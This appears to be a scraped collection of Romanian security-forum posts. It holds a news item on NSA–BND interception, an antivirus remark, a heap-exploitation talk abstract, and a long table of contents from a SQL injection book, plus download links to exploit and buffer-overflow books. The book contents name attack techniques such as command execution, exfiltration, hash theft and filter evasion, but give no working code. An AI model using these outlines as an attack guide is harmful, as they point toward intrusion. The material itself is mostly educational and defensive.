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[h=1]Hunger Games[/h] [h=2]A game theory programming tournament[/h] Write an algorithm to fight to the death against other algorithms. Cooperate and compete with other players at different points in the game to survive and win. [h=2]Who can play?[/h] Anyone – individuals and teams of up to 3 people. [h=2]What skills are tested?[/h] Mathematical analysis, game theory, algorithmic thinking [h=2]When is the submission deadline?[/h] August 18, 2013 5 Grand Prizes: $1,000 each Survivor Prizes: "I survived" T-shirt http://brilliant.org/competitions/hunger-games/
SUA ?i Germania s-au în?eles pentru construirea unui centru special de INTERCEPT?RI telefonice Statele Unite ?i Germania au b?tut palma pentru construirea unui centru special de interceptare a convorbirilor telefonice ?i de colectare a datelor electronice. Noul centru va fi amplasat pe teritoriul german. ?eful Serviciului German de Informa?ii (BND), Gerhard Schindler, a declarat c? înstitu?ia pe care o conduce a negociat cu Agen?ia Na?ional? de Securitate a SUA (NSA) ?i au decis construirea centrului special în Germania, potrivit postului de televiziune rus Vesti-24, citat de Agerpres. Sediul centrului special se va afla la Wiesbaden, acolo unde î?i desf??oar? activitatea Comandamentul european al For?elor Terestre ale Statelor Unite ale Americii. Potrivit ziarului german Mitteldeutsche Zeitung, ?eful BND a f?cut o comunicare în acest sens miercuri în cadrul unei ?edin?e a Bundestag-ului pentru afaceri interne. ?eful Oficiului Federal pentru Protec?ia Constitu?iei, Hans-Georg Maaßen, declarase anterior c? datele de supraveghere electronic? desf??urat? de NSA au fost folosite pentru prevenirea a ?apte acte teroriste pe teritoriul ??rii. Cu toate acestea, o parte a societ??ii germane continu? s? insiste ca guvernul de la Berlin s? cear? clarific?ri administra?iei americane în leg?tur? cu intercept?rile convorbirilor telefonice ale cet??enilor din Germania de c?tre serviciile secrete din SUA, precum ?i a comunica?iilor pe Internet, prin intermediul programului secret PRISM. Sursa: SUA ?i Germania s-au în?eles pentru construirea unui centru special de INTERCEPT?RI telefonice | stiri - Stiri si opinii nonstop, stiri ultima ora - GHIMPELE
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Sursa: AV Security Software Distribution - Distribuitor autorizat G Data Romania Adica: G-Data. E normal ca isi promoveaza produsul. La fel fac toate companiile. Daca veti verifica pe site-urile lor, ESET, Kaspersky, Avira, AVG, Bitdefender si toate celelalte, vor specifica ca la testele Virus Bulletin sau AV Test ei au avut cele mai bune rezultate. Info: http://eugene.kaspersky.com/2013/05/09/av-test-certification-devalued/ Ceva interesant: Eugene Kaspersky: Free AV Vendors Are Cheats
Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap Description: Exploit mitigation technologies have made reliable heap exploitation increasingly difficult since the inception of the 4-byte over write, over ten years ago. At the same time, applications needed to become more stable without using absurd amounts of memory (Who doesn't keep their web browser with multiple tabs open for days?). Heap memory management has matured over time, but with complex new code comes new opportunity for exploitation. This presentation will focus on understanding the Low Fragmentation heap on Windows 7 (32-bit). After a foundation of integral concepts is laid, new exploitation techniques will be thoroughly discussed. Finally, we will use this new found knowledge to leverage supposed non-exploitable vulnerabilities. For More Information please visit :- SyScan 2013 Sursa: Syscan'11 Taipei - Modern Heap Exploitation Using The Low Fragmentation Heap
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SQLi Atack defense Contents Chapter 1 What Is SQL Injection?. 1 Introduction . 2 Understanding How Web Applications Work. 2 A Simple Application Architecture. 4 A More Complex Architecture. 5 Understanding SQL Injection. 6 High-Profile Examples. 10 Understanding How It Happens. 13 Dynamic String Building . 13 Incorrectly Handled Escape Characters. 14 Incorrectly Handled Types . 15 Incorrectly Handled Query Assembly. 17 Incorrectly Handled Errors. 18 Incorrectly Handled Multiple Submissions . 19 Insecure Database Configuration. 21 Summary. 24 Solutions Fast Track. 24 Frequently Asked Questions. 26 Chapter 2 Testing for SQL Injection. 29 Introduction . 30 Finding SQL Injection. 30 Testing by Inference. 31 Identifying Data Entry. 31 GET Requests . 31 POST Requests . 32 Other Injectable Data . 35 Manipulating Parameters . 36 Information Workf low. 39 Database Errors . 40 Commonly Displayed SQL Errors . 41 Microsoft SQL Server Errors. 41 MySQL Errors . 46 Oracle Errors . 49 ix x Contents Application Response. 51 Generic Errors. 51 HTTP Code Errors. 54 Different Response Sizes . 55 Blind Injection Detection. 56 Confirming SQL Injection. 60 Differentiating Numbers and Strings. 61 Inline SQL Injection . 62 Injecting Strings Inline. 62 Injecting Numeric Values Inline. 65 Terminating SQL Injection. 68 Database Comment Syntax. 69 Using Comments. 70 Executing Multiple Statements. 74 Time Delays. 79 Automating SQL Injection Discovery. 80 Tools for Automatically Finding SQL Injection . 81 HP WebInspect . 81 IBM Rational AppScan . 83 HP Scrawlr. 85 SQLiX . 87 Paros Proxy. 88 Summary. 91 Solutions Fast Track. 91 Frequently Asked Questions. 93 Chapter 3 Reviewing Code for SQL Injection . 95 Introduction . 96 Reviewing Source Code for SQL Injection. 96 Dangerous Coding Behaviors . 98 Dangerous Functions . 105 Following the Data. 109 Following Data in PHP. 110 Following Data in Java. 114 Following Data in C#. 115 Reviewing PL/SQL and T-SQL Code. 117 Automated Source Code Review. 124 Yet Another Source Code Analyzer (YASCA) . 125 Pixy. 126 AppCodeScan . 127 Contents xi LAPSE. 127 Security Compass Web Application Analysis Tool (SWAAT). 128 Microsoft Source Code Analyzer for SQL Injection. 128 Microsoft Code Analysis Tool .NET (CAT.NET). 129 Commercial Source Code Review Tools. 129 Ounce. 131 Source Code Analysis. 131 CodeSecure. 132 Summary. 133 Solutions Fast Track. 133 Frequently Asked Questions. 135 Chapter 4 Exploiting SQL Injection . 137 Introduction . 138 Understanding Common Exploit Techniques. 139 Using Stacked Queries. 141 Identifying the Database. 142 Non-Blind Fingerprint. 142 Banner Grabbing. 144 Blind Fingerprint. 146 Extracting Data through UNION Statements. 148 Matching Columns. 149 Matching Data Types . 151 Using Conditional Statements. 156 Approach 1: Time-based. 157 Approach 2: Error-based. 159 Approach 3: Content-based. 161 Working with Strings. 161 Extending the Attack . 163 Using Errors for SQL Injection. 164 Error Messages in Oracle . 167 Enumerating the Database Schema. 170 SQL Server . 171 MySQL. 177 Oracle. 180 Escalating Privileges. 183 SQL Server . 184 Privilege Escalation on Unpatched Servers . 189 Oracle. 190 xii Contents Stealing the Password Hashes . 192 SQL Server . 192 MySQL. 194 Oracle. 194 Oracle Components. 196 APEX. 196 Oracle Internet Directory . 197 Out-of-Band Communication . 198 E-mail. 199 Microsoft SQL Server . 199 Oracle. 202 HTTP/DNS. 203 File System. 203 SQL Server. 204 MySQL. 207 Oracle. 208 Automating SQL Injection Exploitation. 208 Sqlmap. 208 Sqlmap Example . 209 Bobcat. 211 BSQL . 212 Other Tools . 214 Summary. 215 Solutions Fast Track. 215 Frequently Asked Questions. 218 Chapter 5 Blind SQL Injection Exploitation. 219 Introduction . 220 Finding and Confirming Blind SQL Injection. 221 Forcing Generic Errors. 221 Injecting Queries with Side Effects. 222 Spitting and Balancing . 222 Common Blind SQL Injection Scenarios . 225 Blind SQL Injection Techniques. 225 Inference Techniques. 226 Increasing the Complexity of Inference Techniques. 230 Alternative Channel Techniques. 234 Using Time-Based Techniques. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Delaying Database Queries. 235 MySQL Delays . 235 Contents xiii Generic MySQL Binary Search Inference Exploits . 237 Generic MySQL Bit-by-Bit Inference Exploits. 237 SQL Server Delays. 238 Generic SQL Server Binary Search Inference Exploits. 240 Generic SQL Server Bit-by-Bit Inference Exploits . 240 Oracle Delays . 240 Time-Based Inference Considerations. 241 Using Response-Based Techniques. 242 MySQL Response Techniques. 242 SQL Server Response Techniques. 244 Oracle Response Techniques. 246 Returning More Than One Bit of Information. 247 Using Alternative Channels. 249 Database Connections. 250 DNS Exfiltration . 251 E-mail Exfiltration. 255 HTTP Exfiltration. 256 Automating Blind SQL Injection Exploitation. 258 Absinthe . 258 BSQL Hacker . 260 SQLBrute . 263 Sqlninja. 264 Squeeza. 265 Summary. 267 Solutions Fast Track. 267 Frequently Asked Questions. 270 Chapter 6 Exploiting the Operating System. 271 Introduction . 272 Accessing the File System. 273 Reading Files. 273 MySQL. 274 Microsoft SQL Server . 280 Oracle. 289 Writing Files . 291 MySQL. 292 Microsoft SQL Server . 295 Oracle. 300 Executing Operating System Commands. 301 Direct Execution . 301 xiv Contents Oracle. 301 DBMS_SCHEDULER. 302 PL/SQL Native. 302 Other Possibilities. 303 Alter System Set Events. 303 PL/SQL Native 9i. 303 Buffer Overflows. 304 Custom Application Code. 304 MySQL. 304 Microsoft SQL Server . 305 Consolidating Access . 309 Summary. 312 Solutions Fast Track. 312 Frequently Asked Questions. 314 Endnotes. 315 Chapter 7 Advanced Topics . 317 Introduction . 318 Evading Input Filters . 318 Using Case Variation. 319 Using SQL Comments. 319 Using URL Encoding . 320 Using Dynamic Query Execution. 322 Using Null Bytes. 323 Nesting Stripped Expressions . 324 Exploiting Truncation. 324 Bypassing Custom Filters . 326 Using Non-Standard Entry Points. 327 Exploiting Second-Order SQL Injection. 329 Finding Second-Order Vulnerabilities. 332 Using Hybrid Attacks. 335 Leveraging Captured Data. 335 Creating Cross-Site Scripting . 335 Running Operating System Commands on Oracle . 336 Exploiting Authenticated Vulnerabilities. 337 Summary. 338 Solutions Fast Track. 338 Frequently Asked Questions. 340 Contents xv Chapter 8 Code-Level Defenses. 341 Introduction . 342 Using Parameterized Statements. 342 Parameterized Statements in Java. 344 Parameterized Statements in .NET (C#). 345 Parameterized Statements in PHP. 347 Parameterized Statements in PL/SQL. 348 Validating Input. 349 Whitelisting. 349 Blacklisting. 351 Validating Input in Java. 353 Validating Input in .NET. 354 Validating Input in PHP. 354 Encoding Output. 355 Encoding to the Database. 355 Encoding for Oracle . 356 Oracle dbms_assert. 357 Encoding for Microsoft SQL Server. 359 Encoding for MySQL. 360 Canonicalization . 362 Canonicalization Approaches. 363 Working with Unicode . 364 Designing to Avoid the Dangers of SQL Injection. 365 Using Stored Procedures. 366 Using Abstraction Layers. 367 Handling Sensitive Data. 368 Avoiding Obvious Object Names. 369 Setting Up Database Honeypots . 370 Additional Secure Development Resources. 371 Summary. 373 Solutions Fast Track. 373 Frequently Asked Questions. 375 Chapter 9 Platform-Level Defenses. 377 Introduction . 378 Using Runtime Protection. 378 Web Application Firewalls. 379 Using ModSecurity. 380 Configurable Rule Set. 380 Request Coverage. 383 xvi Contents Request Normalization. 383 Response Analysis. 384 Intrusion Detection Capabilities. 385 Intercepting Filters. 386 Web Server Filters. 386 Application Filters. 389 Implementing the Filter Pattern in Scripted Languages . 390 Filtering Web Service Messages. 391 Non-Editable versus Editable Input Protection. 391 URL/Page-Level Strategies. 392 Page Overriding . 392 URL Rewriting . 393 Resource Proxying/Wrapping . 393 Aspect-Oriented Programming (AOP) . 393 Application Intrusion Detection Systems (IDSs). 394 Database Firewall. 394 Securing the Database . 395 Locking Down the Application Data. 395 Use the Least-Privileged Database Login. 395 Revoke PUBLIC Permissions. 396 Use Stored Procedures. 396 Use Strong Cryptography to Protect Stored Sensitive Data . 397 Maintaining an Audit Trail. 398 Oracle Error Triggers. 398 Locking Down the Database Server. 400 Additional Lockdown of System Objects. . . . . . . . . . . . . . . . . . . . . . . . 400 Restrict Ad Hoc Querying. 401 Strengthen Controls Surrounding Authentication . 401 Run in the Context of the Least-Privileged Operating System Account . 401 Ensure That the Database Server Software Is Patched. 402 Additional Deployment Considerations. 403 Minimize Unnecessary Information Leakage. 403 Suppress Error Messages. 403 Use an Empty Default Web Site. 406 Use Dummy Host Names for Reverse DNS Lookups. 406 Use Wildcard SSL Certificates . 407 Limit Discovery via Search Engine Hacking. 407 Disable Web Services Description Language (WSDL) Information. 408 Contents xvii Increase the Verbosity of Web Server Logs . 409 Deploy the Web and Database Servers on Separate Hosts. 409 Configure Network Access Control. 409 Summary. 410 Solutions Fast Track. 410 Frequently Asked Questions. 412 Chapter 10 References. 415 Introduction . 416 Structured Query Language (SQL) Primer. 416 SQL Queries. 416 SELECT Statement. 417 UNION Operator. 417 INSERT Statement. 418 UPDATE Statement. 418 DELETE Statement. 418 DROP Statement . 420 CREATE TABLE Statement . 420 ALTER TABLE Statement. 420 GROUP BY Statement. 421 ORDER BY Clause. 421 Limiting the Result Set . 421 SQL Injection Quick Reference. 422 Identifying the Database Platform. 422 Identifying the Database Platform via Time Delay Inference . 423 Identifying the Database Platform via SQL Dialect Inference. 423 Combining Multiple Rows into a Single Row. 424 Microsoft SQL Server Cheat Sheet. 425 Enumerating Database Configuration Information and Schema. 425 Blind SQL Injection Functions: Microsoft SQL Server . 427 Microsoft SQL Server Privilege Escalation . 427 OPENROWSET Reauthentication Attack. 428 Attacking the Database Server: Microsoft SQL Server. 429 System Command Execution via xp_cmdshell . 429 xp_cmdshell Alternative. 430 Cracking Database Passwords. 430 Microsoft SQL Server 2005 Hashes . 431 File Read/Write. 431 xviii Contents MySQL Cheat Sheet . 431 Enumerating Database Configuration Information and Schema . 431 Blind SQL Injection Functions: MySQL. 432 Attacking the Database Server: MySQL . 433 System Command Execution. 433 Cracking Database Passwords. 434 Attacking the Database Directly. 434 File Read/Write. 434 Oracle Cheat Sheet . 435 Enumerating Database Configuration Information and Schema . 435 Blind SQL Injection Functions: Oracle. 436 Attacking the Database Server: Oracle. 437 Command Execution . 437 Reading Local Files. 437 Reading Local Files (PL/SQL Injection Only) . 438 Writing Local Files (PL/SQL Injection Only). 439 Cracking Database Passwords. 440 Bypassing Input Validation Filters . 440 Quote Filters. 440 HTTP Encoding . 442 Troubleshooting SQL Injection Attacks. 443 SQL Injection on Other Platforms. 446 PostgreSQL Cheat Sheet. 446 Enumerating Database Configuration Information and Schema . 447 Blind SQL Injection Functions: PostgreSQL. 448 Attacking the Database Server: PostgreSQL. 448 System Command Execution. 448 Local File Access. 449 Cracking Database Passwords. 449 DB2 Cheat Sheet. 449 Enumerating Database Configuration Information and Schema . 449 Blind SQL Injection Functions: DB2. 450 Informix Cheat Sheet. 451 Enumerating Database Configuration Information and Schema . 451 Blind SQL Injection Functions: Informix. 452 Contents xix Ingres Cheat Sheet. 452 Enumerating Database Configuration Information and Schema . 452 Blind SQL Injection Functions: Ingres . 453 Microsoft Access. 453 Resources . 453 SQL Injection White Papers. 453 SQL Injection Cheat Sheets. 454 SQL Injection Exploit Tools. 454 Password Cracking Tools. 455 Solutions Fast Track. 456 Index. 459 Download: http://rogunix.com/docs/WebSecurity/SQLi%20Atack%20defense.pdf
Rogunix: http://rogunix.com/docs/
Syngress Zero Day Exploit Countdown to Darkness The realistic portrayals of researching, developing, and ultimately defending the Internet from a malicious "Zero-Day" attack will appeal to every corner of the IT community. Although finctional, the numerous accounts of real events and references to real people will ring true with every member of the security community. This book will also satisfy those not on the "inside" of this community, who are fascinated by the real tactics and motives of criminal, malicous hackers and those who defent the Internet from them. Download: http://library.back2hack.cc/books/Other/Syngress_-_Zero_Day_Exploit_-_Countdown_to_Darkness_%5B%5D_%282004%29_en.pdf
Sockets, Shellcode, Porting, and Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals James C Foster - aprilie 2005 Syngress - Editor Descriere The book is logically divided into 5 main categories with each category representing a major skill set required by most security professionals:1. Coding – The ability to program and script is quickly becoming a mainstream requirement for just about everyone in the security industry. This section covers the basics in coding complemented with a slue of programming tips and tricks in C/C++, Java, Perl and NASL. Download: http://www.multiupload.nl/50NRESVUMM Am cautat ceva pana sa o gasesc.
Buffer Overflow Attacks The buffer overflow is the whipping boy of software security. The main reason for omnipresent discussion and hype surrounding the buffer overflow is that the buffer overflow remains the principal method used to exploit software by remotely injecting malicious code into a target. Al- though the techniques of buffer overflow have been widely published else- where, this chapter remains a necessity. The buffer overflow has evolved over the years, as have a number of other attack techniques and, as a result, powerful new buffer overflow attacks have been developed. If nothing else, this chapter will serve as a foundation as you come to grips with the subtle nature of buffer overflows Download: http://library.back2hack.cc/books/Hacking/Syngress_-_Buffer_Overflow_Attacks_-_Detect_Exploit_and_Prevent_%5B%5D_%282000%29_en.pdf
Buffer-Overflow Vulnerabilities and Attacks 1 Memory In the PC architecture there are four basic read-write memory regions in a program: Stack, Data, BSS (Block Started by Symbol), and Heap. The data, BSS, and heap areas are collectively referred to as the ”data segment”. In the tutorial titled “Memory Layout And The Stack” [1], Peter Jay Salzman described memory layout in a great detail. Stack: Stack typically located in the higher parts of memory. It usually ”grows down”: from high address to low address. Stack is used whenever a function call is made. Data Segment – Data area: contains global variables used by the program that are not initialized to zero. For instance the string “hello world” defined by char s[] = "hello world" in C would exist in the data part. – BSS segment: starts at the end of the data segment and contains all global variables that are initialized to zero. For instance a variable declared static int i would be contained in the BSS segment. – Heap area: begins at the end of the BSS segment and grows to larger addresses from there. The Heap area is managed by malloc , realloc , and free . The Heap area is shared by all shared libraries and dynamic load modules in a process Download: http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Buffer_Overflow.pdf